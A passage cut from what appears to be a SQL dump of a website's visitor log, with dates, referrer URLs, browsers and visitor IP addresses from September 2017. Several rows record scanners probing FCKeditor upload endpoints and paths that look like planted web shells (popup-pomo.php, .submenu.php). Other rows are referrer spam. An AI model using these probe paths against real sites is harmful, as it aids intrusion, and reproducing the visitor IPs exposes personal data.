irefox','Windows','7.0.1','','185.38.14.171','000',2,0),(10735,'2017-09-10','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','67.207.89.222','000',1,0),(10736,'2017-09-10','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(10737,'2017-09-10','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(10738,'2017-09-10','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','138.197.86.3','000',1,0),(10739,'2017-09-10','http://zphiblgz.org','MSIE','Windows','11.0','','34.209.175.228','000',2,0),(10740,'2017-09-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','94.142.242.84','000',2,0),(10741,'2017-09-10','http://zphiblgz.org','Firefox','Windows','40.1','','79.70.119.135','000',2,0),(10742,'2017-09-10','http://zphiblgz.org/','MSIE','Windows','8.0','','62.24.181.135','000',1,0),(10743,'2017-09-10','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','138.197.126.43','000',1,0),(10744,'2017-09-10','http://zphiblgz.org','Firefox','Windows','40.1','','79.180.146.251','000',2,0),(10745,'2017-09-10','http://zphiblgz.org','Chrome','Macintosh','27.0.1453.93','','46.161.9.4','000',1,0),(10746,'2017-09-10','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','138.197.118.239','000',1,0),(10747,'2017-09-10','http://zphiblgz.org','Safari','iPad','9.0','','173.69.155.28','000',1,0),(10748,'2017-09-10','http://komp-pomosch.ru/','MSIE','Windows','5.5','','188.163.72.15','000',5,0),(10749,'2017-09-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','195.22.126.178','000',2,0),(10750,'2017-09-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','115.28.111.201','000',13,0),(10751,'2017-09-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','167.114.251.167','000',2,0),(10752,'2017-09-10','http://zphiblgz.org/followup/popup-pomo.php','Chrome','Windows','5.0.375.99','','91.221.61.178','000',3,0),(10753,'2017-09-10','http://zphiblgz.org','Firefox','Windows','40.1','','218.188.218.226','000',2,0),(10754,'2017-09-10','http://zphiblgz.org','Chrome','Macintosh','60.0.3112.113','','165.230.225.27','000',4,0),(10755,'2017-09-10','http://zphiblgz.org/','Safari','iPhone','10.0','','172.58.185.195','000',4,0),(10756,'2017-09-10','https://liky.co.ua/','Opera','Windows','9.00','','46.118.159.26','000',2,0),(10757,'2017-09-10','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(10758,'2017-09-10','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','91.121.83.160','000',4,0),(10759,'2017-09-10','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1541.5vCbF2p9zGYdsj7eKKqcqQIyy2ptlJCKQuHYiQFCsEqpF5lLr4cYMfTqoy7ezETc.525150401c9ba80d01c69d68869e4bd984c610cb&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YFUVNhHyyhJgRFg5yeLMIWU&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSVVTQjdlcjE3RGJvVk1OUzFuZng4VXlDWW5BYlp1NlNnWlAyOGFGRl9mNUg3R1VvaU9VOU9S&b64e=2&sign=929feef4469ece820ce86b29236cb5fc&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv4GusIbVVfY4RY6YcvfQA-4WM-OiV5TPbDdJFTwsU6EmGK2SBdfTilhnQUAmYCaNqT1KqlJLuHjROuVFR0WXUb_Ce05r1DOn7PL9rijozLJyt8rvG2Fa3SSTXIK7VgDxXD&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWbgDHRNa-0ykB_isYVAduLUEZyKKfXb2yc7zdU7GFnUh9ebUN4b9d2Kg5ofu6DmOfLb-M-gMLvew&l10n=ru&cts=1505099214939&mc=7.21635802528','Firefox','Windows','53.0','','178.140.51.103','000',1,0),(10760,'2017-09-10','http://zphiblgz.org','Firefox','Windows','40.1','','120.145.12.50','000',2,0),(10761,'2017-09-10','http://zphiblgz.org','Firefox','Windows','40.1','','93.44.83.98','000',2,0),(10762,'2017-09-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.140.123','000',2,0),(10763,'2017-09-11','zphiblgz.org/modules/fckeditor/editor/filemanager/upload/php/upload.php','Firefox','Windows','52.0','','176.8.89.217','000',1,0),(10764,'2017-09-11','http://sudexpert66.ru/','MSIE','Windows','6.0','','46.118.154.197','000',4,0),(10765,'2017-09-11','https://via-energy-cumpara.com/','MSIE','Windows','5.5','','46.118.159.26','000',2,0),(10766,'2017-09-11','http://zphiblgz.org','Firefox','Windows','50.0','','212.91.205.142','000',2,0),(10767,'2017-09-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.73.206','000',1,0),(10768,'2017-09-11','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.70.13','000',1,0),(10769,'2017-09-11','http://zphiblgz.org','Chrome','Linux','12.0.742.112','','198.27.80.144','000',49,0),(10770,'2017-09-11','http://zphiblgz.org','MSIE','Windows','6.0','','185.147.82.115','000',2,0),(10771,'2017-09-11','zphiblgz.org/modules/FCKeditor/editor/filemanager/upload/php/upload.php','Safari','Macintosh','10.1','','46.119.119.131','000',1,0),(10772,'2017-09-11','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.21','000',15,0),(10773,'2017-09-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.31.39.249','000',1,0),(10774,'2017-09-11','http://zphiblgz.org/','Firefox','Windows','7.0.1','','62.102.148.67','000',3,0),(10775,'2017-09-11','http://zphiblgz.org','curl','Unknown','7.47.0','','185.162.128.146','000',1,0),(10776,'2017-09-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','191.96.249.110','000',2,0),(10777,'2017-09-11','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.212.115','000',1,0),(10778,'2017-09-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.179.129','000',2,0),(10779,'2017-09-11','http://remontvsamare.su/','Opera','Windows','6.0','','46.118.154.197','000',3,0),(10780,'2017-09-11','http://zphiblgz.org/wp-content/upgrade/theme-compat/popup-pomo.php','Chrome','Windows','5.0.375.99','','185.69.154.71','000',2,0),(10781,'2017-09-11','http://zphiblgz.org','Firefox','Windows','46.0','','192.126.178.255','000',3,0),(10782,'2017-09-11','http://zphiblgz.org','MSIE','Windows','6.0','','185.102.136.19','000',1,0),(10783,'2017-09-11','http://krassh.ru/','MSIE','Windows','6.0','','134.249.80.194','000',3,0),(10784,'2017-09-11','http://zphiblgz.org','Safari','iPhone','10.0','','69.143.34.19','000',5,0),(10785,'2017-09-11','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',1,0),(10786,'2017-09-11','zphiblgz.org/editor/editor/filemanager/upload/php/upload.php','Chrome','Windows','56.0.2924.87','','178.137.83.124','000',1,0),(10787,'2017-09-11','http://zphiblgz.org/','Safari','Macintosh','10.1','','200.116.227.138','000',3,0),(10788,'2017-09-11','http://zphiblgz.org','Firefox','Linux','54.0','','192.198.80.227','000',2,0),(10789,'2017-09-11','https://mojpregled.com/','MSIE','Windows','6.0','','188.163.72.15','000',3,0),(10790,'2017-09-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.170.194','000',2,0),(10791,'2017-09-11','https://pl-top.pl/','MSIE','Unknown','6.0','','188.163.72.15','000',1,0),(10792,'2017-09-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','78.63.161.0','000',2,0),(10793,'2017-09-11','http://zphiblgz.org','Chrome','Windows','38.0.2125.104','','146.185.223.122','000',2,0),(10794,'2017-09-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.85.101','000',2,0),(10795,'2017-09-11','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','163.172.255.139','000',2,0),(10796,'2017-09-11','zphiblgz.org/fck/editor/filemanager/upload/php/upload.php','Opera Next','Windows','43.0.2442.1144','','178.137.83.124','000',1,0),(10797,'2017-09-11','https://www.google.com/','Chrome','Windows','60.0.3112.113','','173.233.57.214','000',2,0),(10798,'2017-09-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.70.226','000',1,0),(10799,'2017-09-11','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.38.14.171','000',1,0),(10800,'2017-09-11','http://pochtovyi-index.ru/','MSIE','Windows','6.0','','46.118.158.19','000',6,0),(10801,'2017-09-11','http://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&cad=rja&uact=8&ved=0ahUKEwj8x-Gz253WAhUE3YMKHXSrBnUQjRwIBw&url=http%3A%2F%2Fzphiblgz.org%2Fyouth%2F&psig=AFQjCNFbsUAb0T_j1U03rlJgSqjXFnSJjg&ust=1505239266668717','MSIE','Windows','11.0','','198.7.141.2','000',2,0),(10802,'2017-09-11','http://zphiblgz.org/service/breakfastonthego/','Safari','iPhone','10.0','','204.126.132.241','000',1,0),(10803,'2017-09-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.220.35.202','000',2,0),(10804,'2017-09-11','https://www.google.com/','Chrome','Windows','59.0.3071.115','','73.132.243.51','000',1,0),(10805,'2017-09-11','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.101.169','000',1,0),(10806,'2017-09-11','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.100.224','000',1,0),(10807,'2017-09-11','http://burger-imperia.com/','Chrome','Linux','37.0.2062.120','','185.103.99.60','000',1,0),(10808,'2017-09-11','http://zphiblgz.org','Chrome','Windows','60.0.3112.113','','205.222.248.217','000',3,0),(10809,'2017-09-11','http://zphiblgz.org','Chrome','Macintosh','27.0.1453.93','','46.161.9.4','000',1,0),(10810,'2017-09-11','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',2,0),(10811,'2017-09-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.207','000',1,0),(10812,'2017-09-11','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(10813,'2017-09-11','http://zphiblgz.org','Chrome','Windows','60.0.3112.113','','198.51.197.174','000',6,0),(10814,'2017-09-11','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','54.200.47.86','000',1,0),(10815,'2017-09-11','http://www.zphibmaryland.org/chapters/','Chrome','Windows','60.0.3112.113','','69.195.247.116','000',5,0),(10816,'2017-09-11','http://zphiblgz.org/updatecorea/popup-pomo.php','Chrome','Windows','5.0.375.99','','217.160.63.143','000',2,0),(10817,'2017-09-11','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','73.135.240.26','000',3,0),(10818,'2017-09-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.89','000',2,0),(10819,'2017-09-11','http://zphiblgz.org','Firefox','Windows','40.1','','83.165.1.150','000',2,0),(10820,'2017-09-11','http://zphiblgz.org','Firefox','Windows','40.1','','110.159.18.141','000',2,0),(10821,'2017-09-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.137.80.94','000',2,0),(10822,'2017-09-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','138.197.207.243','000',2,0),(10823,'2017-09-11','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.14','000',13,0),(10824,'2017-09-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','212.21.66.6','000',2,0),(10825,'2017-09-11','http://zphiblgz.org','Firefox','Windows','3.6.3','','54.225.33.229','000',1,0),(10826,'2017-09-11','http://zphiblgz.org/updatecorea/popup-pomo.php','Chrome','Windows','5.0.375.99','','136.243.150.82','000',1,0),(10827,'2017-09-11','http://zphiblgz.org','Unknown','Unknown','Unknown','','69.58.178.59','000',13,0),(10828,'2017-09-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.82.216.241','000',2,0),(10829,'2017-09-11','http://zphiblgz.org','Chrome','Macintosh','60.0.3112.90','','138.197.111.85','000',1,0),(10830,'2017-09-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.215','000',2,0),(10831,'2017-09-11','http://zphiblgz.org/','Opera Next','Windows','44.0.2510.1449','','213.242.1.127','000',2,0),(10832,'2017-09-11','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','73.201.199.79','000',11,0),(10833,'2017-09-11','http://zphiblgz.org','Chrome','Linux','58.0.3029.81','','34.199.5.190','000',1,0),(10834,'2017-09-11','http://zphiblgz.org','Firefox','Windows','40.1','','203.122.225.40','000',2,0),(10835,'2017-09-11','http://zphiblgz.org','Firefox','Windows','40.1','','70.77.80.43','000',2,0),(10836,'2017-09-11','http://zphiblgz.org/general/popup-pomo.php','Chrome','Windows','5.0.375.99','','64.111.126.43','000',1,0),(10837,'2017-09-11','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.16','000',1,0),(10838,'2017-09-11','http://zphiblgz.org/networksa/popup-pomo.php','Chrome','Windows','5.0.375.99','','207.246.240.113','000',2,0),(10839,'2017-09-11','http://zphiblgz.org','Chrome','Windows','60.0.3112.113','','108.31.174.253','000',1,0),(10840,'2017-09-12','zphiblgz.org/jscripts/FCKeditor/editor/filemanager/upload/php/upload.php','Chrome','Windows','58.0.3029.110','','46.119.120.221','000',1,0),(10841,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.171','000',4,0),(10842,'2017-09-12','http://zphiblgz.org/terma/popup-pomo.php','Chrome','Windows','5.0.375.99','','80.87.203.9','000',1,0),(10843,'2017-09-12','http://zphiblgz.org','Python','Unknown','3.6','','54.246.232.190','000',1,0),(10844,'2017-09-12','http://zphiblgz.org/setupconfiga/popup-pomo.php','Chrome','Windows','5.0.375.99','','75.98.174.194','000',2,0),(10845,'2017-09-12','http://zphiblgz.org/mondialrelay/popup-pomo.php','Chrome','Windows','5.0.375.99','','78.110.50.110','000',2,0),(10846,'2017-09-12','http://zphiblgz.org/revision/popup-pomo.php','Chrome','Windows','5.0.375.99','','212.244.23.251','000',1,0),(10847,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',3,0),(10848,'2017-09-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','37.9.169.6','000',39,0),(10849,'2017-09-12','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1542.HhWmsf4v8OaO68eSiyE_EuWxrHwa1nEpz8VSz_l3vS4ewUVvckyW_G_gYWBiiJgI.6646051e9059bf69d6ede84ac834fd8af95c6353&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGv9iZwKiy-E54GYiollMFA&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSVVTQjdlcjE3RGJpanZKQjZPeVlpZnhPemFvTnhqeDQ0NU5ObHBkNlBRRndKUWdMLTVvVkVB&b64e=2&sign=2d3106bdeb8e32f8c32a69d851709a14&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQXbYQp9t5VF6XnhKaF4ySabw2w9J929Tg62apKij1w6_8T2cmda27n7gMr_oz1LJ0kCZQWtNacBSp1AbAcvr3S0u8ffkpTwNqisDWFIUqbVitLMfnphzgvFpY-Kjh7bF2aETcm1KFmTn&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWLmUMpz38pRImQ7gwqoJGZSQB_6c-yrgtJNgHGTatQ4WnWXvE-VmD_f7BzaaMEzez3wCvuSjRxxg&l10n=ru&cts=1505205740429&mc=6.27966903226','Firefox','Windows','53.0','','128.68.18.162','000',1,0),(10850,'2017-09-12','http://zphiblgz.org','MSIE','Windows','6.0','','185.173.178.127','000',2,0),(10851,'2017-09-12','http://zphiblgz.org/networksa/popup-pomo.php','Chrome','Windows','5.0.375.99','','176.9.9.147','000',3,0),(10852,'2017-09-12','http://life-instyle.com/','Unknown','Unknown','Unknown','','46.118.154.197','000',3,0),(10853,'2017-09-12','http://zphiblgz.org','Chrome','Windows','59.0.3071.115','','192.198.80.227','000',2,0),(10854,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.172.193.32','000',4,0),(10855,'2017-09-12','http://zphiblgz.org/terma/popup-pomo.php','Chrome','Windows','5.0.375.99','','122.201.118.118','000',2,0),(10856,'2017-09-12','http://komputers-best.ru/','MSIE','Windows','5.5','','134.249.80.194','000',1,0),(10857,'2017-09-12','http://zphiblgz.org/wp-content/plugins/editor-extender/.submenu.php','Chrome','Windows','5.0.375.99','','193.124.176.128','000',2,0),(10858,'2017-09-12','http://zphiblgz.org/toolsa/popup-pomo.php','Chrome','Windows','5.0.375.99','','64.71.32.12','000',2,0),(10859,'2017-09-12','http://www.google.com/url?sa=t&rct=j&q=zphiblgz.org&source=web&cd=5&ved=0CF0QFjAE&url=http:%2F%2Fzphiblgz.org%2F&cad=rja','Lynx','Unknown','2.8.5rel.1','','78.158.11.226','000',1,0),(10860,'2017-09-12','http://copro.pw/','Unknown','Unknown','Unknown','','46.118.158.19','000',1,0),(10861,'2017-09-12','https://www.google.com/','Chrome','Windows','60.0.3112.113','','205.222.248.62','000',2,0),(10862,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.165','000',1,0),(10863,'2017-09-12','http://zphiblgz.org/','Firefox','Windows','7.0.1','','23.129.64.18','000',1,0),(10864,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.15.16.4','000',2,0),(10865,'2017-09-12','https://i-hobot.ru/','Unknown','Unknown','Unknown','','46.118.159.26','000',5,0),(10866,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.199.130.188','000',2,0),(10867,'2017-09-12','http://zphiblgz.org','Firefox','Windows','40.1','','110.140.152.21','000',2,0),(10868,'2017-09-12','http://zphiblgz.org','Firefox','Windows','40.1','','27.131.213.52','000',2,0),(10869,'2017-09-12','http://zphiblgz.org','Firefox','Windows','40.1','','87.96.133.47','000',1,0),(10870,'2017-09-12','zphiblgz.org/scripts/fckeditor/editor/filemanager/upload/php/upload.php','Opera Next','Windows','43.0.2442.1144','','46.118.126.16','000',1,0),(10871,'2017-09-12','http://life-instyle.com/eda.html','Opera','Windows','6.0','','46.118.158.19','000',2,0),(10872,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','141.170.2.53','000',1,0),(10873,'2017-09-12','http://zphiblgz.org/','Firefox','Windows','7.0.1','','176.126.252.12','000',1,0),(10874,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.85.190','000',2,0),(10875,'2017-09-12','http://www.zahvat.ru/','Unknown','Unknown','Unknown','','188.163.72.15','000',3,0),(10876,'2017-09-12','http://zphiblgz.org','Firefox','Windows','40.1','','154.72.162.183','000',2,0),(10877,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.101.137','000',2,0),(10878,'2017-09-12','http://zphiblgz.org/','Firefox','Windows','7.0.1','','80.85.84.23','000',1,0),(10879,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.84.108','000',2,0),(10880,'2017-09-12','http://zphiblgz.org','Chrome','Windows','60.0.3112.101','','185.45.192.115','000',1,0),(10881,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.70.226','000',2,0),(10882,'2017-09-12','zphiblgz.org/plugins/fckeditor/FCKeditor/editor/filemanager/upload/php/upload.php','Opera Next','Windows','44.0.2510.1449','','134.249.52.185','000',1,0),(10883,'2017-09-12','https://www.google.com/','Chrome','Windows','60.0.3112.113','','73.200.100.190','000',1,0),(10884,'2017-09-12','https://www.bing.com/','MSIE','Windows','11.0','','128.229.4.2','000',1,0),(10885,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.162.106','000',2,0),(10886,'2017-09-12','http://zphiblgz.org','Firefox','Windows','40.1','','27.142.25.123','000',2,0),(10887,'2017-09-12','http://zphiblgz.org','Firefox','Windows','40.1','','175.158.226.117','000',2,0),(10888,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','196.54.55.14','000',1,0),(10889,'2017-09-12','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.163.1.11','000',1,0),(10890,'2017-09-12','http://zphiblgz.org','Firefox','Windows','40.1','','217.55.163.91','000',2,0),(10891,'2017-09-12','http://zphiblgz.org','Firefox','Windows','40.1','','5.20.200.50','000',2,0),(10892,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.104.243','000',1,0),(10893,'2017-09-12','http://www.zphibmaryland.org/chapters/','Chrome','Windows','60.0.3112.113','','69.195.247.116','000',2,0),(10894,'2017-09-12','zphiblgz.org/resources/fckeditor/editor/filemanager/upload/php/upload.php','Firefox','Macintosh','53.0','','46.118.157.206','000',1,0),(10895,'2017-09-12','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(10896,'2017-09-12','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(10897,'2017-09-12','http://zphiblgz.org/wp-admin/includes/images.php?postfile','MSIE','Windows','6.0','','222.144.49.107','000',1,0),(10898,'2017-09-12','http://zphiblgz.org','MSIE','Windows','6.0','','77.73.68.41','000',1,0),(10899,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.168','000',3,0),(10900,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.76.81','000',2,0),(10901,'2017-09-12','http://zphiblgz.org','Firefox','Windows','40.1','','41.42.118.11','000',2,0),(10902,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','158.69.220.128','000',3,0),(10903,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.104.240','000',2,0),(10904,'2017-09-12','http://zphiblgz.org','Firefox','Windows','40.1','','181.51.71.141','000',2,0),(10905,'2017-09-12','http://www.zahvat.ru/','Opera','Windows','6.01','','46.118.159.26','000',2,0),(10906,'2017-09-12','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','206.41.183.146','000',1,0),(10907,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','128.52.128.105','000',1,0),(10908,'2017-09-12','http://zphiblgz.org/','Firefox','Windows','7.0.1','','162.243.166.137','000',1,0),(10909,'2017-09-12','http://zphiblgz.org','Firefox','Windows','40.1','','80.180.190.107','000',2,0),(10910,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.169.241','000',2,0),(10911,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.189.14.230','000',2,0),(10912,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.183.221.231','000',2,0),(10913,'2017-09-12','http://zphiblgz.org','curl','Unknown','7.38.0','','195.22.126.98','000',1,0),(10914,'2017-09-12','https://xn--80abgj3a5acid6ghs.top/','MSIE','Windows','6.0','','46.118.154.197','000',1,0),(10915,'2017-09-12','https://via-energy-order.com/','MSIE','Windows','6.0','','46.118.159.26','000',2,0),(10916,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.201.133.100','000',1,0),(10917,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','66.70.217.179','000',2,0),(10918,'2017-09-12','http://zphiblgz.org','Firefox','Linux','28.0','','23.95.107.114','000',2,0),(10919,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','149.202.185.34','000',2,0),(10920,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.220.35.202','000',1,0),(10921,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.167.96','000',1,0),(10922,'2017-09-12','http://zphiblgz.org/','Firefox','Windows','7.0.1','','46.183.218.199','000',3,0),(10923,'2017-09-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.70.10.238','000',2,0),(10924,'2017-09-12','https://mojpreskumanie.com/','MSIE','Windows','6.0','','188.163.72.15','000',2,0),(10925,'2017-09-12','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1543._6FXRgVivt3B_98hHt1rfL1DBjwhmAkBG02TZx0jOOYoWY9pSgab0z0RSIxp5K4_.84d97e4d4767d8f087eca154d1bc3dd773d8c8d4&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGv9iZwKiy-E54GYiollMFA&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSVVTQjdlcjE3RGJuazFDU3hGUUNTc29oZ3pkYTkzd2tPSWVYYlY4MVVQSjR2QnNJVncyVGZG&b64e=2&sign=451481941cc649b464a95cf0d1a76121&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7Jarr_DbLQx8nnWx3z_EhrUXPgduyiK3qoINQUUUwT_nkraEbZQx58nQcTc6RrHD4OATf21EBLgWck8yvtBUNu4Dl4F42lMlNLaTA_k1lJdKXrUMmF7RfV4rOeIGbFUXj1nqp&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWbgDHRNa-0yrqalri2eSLZTJOOcjKYje4RT91kulSrC4i11buSTfLTm88DZBcPmaYejOB77WBQTw&l10n=ru&cts=1505277500375&mc=2.87391699287','Firefox','Windows','53.0','','95.24.17.242','000',1,0),(10926,'2017-09-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',1,0),(10927,'2017-09-13','http://zphiblgz.org/','Firefox','Windows','7.0.1','','199.87.154.255','000',1,0),(10928,'2017-09-13','https://woweb.com.ua/','MSIE','Windows','6.0','','46.118.154.197','000',6,0),(10929,'2017-09-13','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.117','000',1,0),(10930,'2017-09-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','138.197.207.243','000',1,0),(10931,'2017-09-13','http://zphiblgz.org/','Firefox','Windows','7.0.1','','87.118.116.90','000',1,0),(10932,'2017-09-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','146.185.177.103','000',2,0),(10933,'2017-09-13','http://zphiblgz.org','Firefox','Linux','49.0','','138.197.111.190','000',1,0),(10934,'2017-09-13','http://zphiblgz.org','Opera Next','Macintosh','46.0.2597.57','','138.197.111.190','000',3,0),(10935,'2017-09-13','http://zphiblgz.org','Firefox','Linux','54.0','','138.197.111.190','000',1,0),(10936,'2017-09-13','http://zphiblgz.org','Chrome','Macintosh','58.0.3029.81','','138.197.111.190','000',2,0),(10937,'2017-09-13','http://zphiblgz.org','Safari','Macintosh','10.0.3','','138.197.111.190','000',1,0),(10938,'2017-09-13','http://zphiblgz.org','Chrome','Windows','60.0.3112.78','','138.197.111.190','000',3,0),(10939,'2017-09-13','http://zphiblgz.org','Chrome','Linux','59.0.3071.115','','138.197.111.190','000',2,0),(10940,'2017-09-13','http://zphiblgz.org','Firefox','Windows','54.0','','138.197.111.190','000',1,0),(10941,'2017-09-13','http://zphiblgz.org','Firefox','Linux','47.0','','138.197.111.190','000',1,0),(10942,'2017-09-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.112.157.135','000',2,0),(10943,'2017-09-13','http://zphiblgz.org','Safari','iPhone','10.0','','96.244.137.88','000',1,0),(10944,'2017-09-13','https://www.google.com/','Chrome','Android','60.0.3112.116','','73.135.45.45','000',1,0),(10945,'2017-09-13','zphiblgz.org/includes/fckeditor/editor/filemanager/upload/php/upload.php','Firefox','Windows','52.0','','178.137.84.175','000',1,0),(10946,'2017-09-13','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.86','000',1,0),(10947,'2017-09-13','http://zphiblgz.org','Chrome','Chrome OS','60.0.3112.112','','69.143.34.19','000',6,0),(10948,'2017-09-13','http://www.google.com/','Chrome','Android','60.0.3112.116','','73.132.243.51','000',3,0),(10949,'2017-09-13','http://zphiblgz.org','Firefox','Windows','40.1','','180.244.28.37','000',1,0),(10950,'2017-09-13','http://komp-pomosch.ru/','MSIE','Windows','6.0','','188.163.72.15','000',1,0),(10951,'2017-09-13','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','104.196.237.125','000',1,0),(10952,'2017-09-13','http://zphiblgz.org','MSIE','Windows','6.0','','91.191.184.162','000',2,0),(10953,'2017-09-13','http://www.zphiblgz.org/plus/mytag_js.php','MSIE','Windows','6.0','','119.29.218.191','000',6,0),(10954,'2017-09-13','http://zphiblgz.org','Firefox','Windows','50.0','','183.87.114.130','000',2,0),(10955,'2017-09-13','http://zphiblgz.org','Firefox','Windows','40.1','','82.56.28.40','000',2,0),(10956,'2017-09-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.207','000',4,0),(10957,'2017-09-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','66.70.217.179','000',2,0),(10958,'2017-09-13','http://irkutsk.zrus.org/','MSIE','Windows','5.5','','46.118.158.19','000',1,0),(10959,'2017-09-13','http://zphiblgz.org','Firefox','Windows','40.1','','41.142.102.25','000',2,0),(10960,'2017-09-13','http://www.ens-pbs1914.com/links/','Chrome','Windows','60.0.3112.113','','100.16.184.25','000',13,0),(10961,'2017-09-13','http://zphiblgz.org','Firefox','Windows','40.1','','212.3.193.23','000',2,0),(10962,'2017-09-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.220.35.202','000',2,0),(10963,'2017-09-13','http://zphiblgz.org','Firefox','Windows','40